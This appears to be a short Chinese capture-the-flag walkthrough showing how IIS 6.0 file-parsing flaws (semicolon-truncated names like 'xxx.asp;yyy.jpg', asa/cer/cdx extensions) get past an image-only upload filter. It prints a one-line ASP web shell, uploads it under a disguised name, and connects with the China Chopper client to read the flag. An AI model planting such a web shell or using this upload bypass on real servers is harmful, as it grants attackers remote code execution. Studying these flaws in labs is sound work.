IIS6.0 有以下文件解析漏洞:
- 在文件夹为 asp, asa 内的所有文件都会被当成asp脚本进行解析;
- 文件名如:xxx.asp;yyy.jpg 的文件,会忽略分号后面的后缀,将该文件当成asp脚本进行解析
- asa、cer、cdx 也会被当成asp脚本进行解析
查看源码:
![](https://img.haomeiwen.com/i6936994/0c2b8dfcfdf5f0d3.png)
可以看到支持上传的后缀名有:gif、jpeg、jpg、png。
这里我就直接将一句话木马保存为 xxx.asp;yyy.jpg 文件的方式来做。
我的一句话木马内容为:
<%eval request("heroes")%>
保存为 ladybird252.asp;1.jpg ,上传结果如下:
![](https://img.haomeiwen.com/i6936994/b55f758bd7fc51f9.png)
然后用菜刀连接:
![](https://img.haomeiwen.com/i6936994/9977eecb0f0ace52.png)
进入保存上传文件的目录中找到flag文件:
![](https://img.haomeiwen.com/i6936994/0f5e86b2bab9d38a.png)
网友评论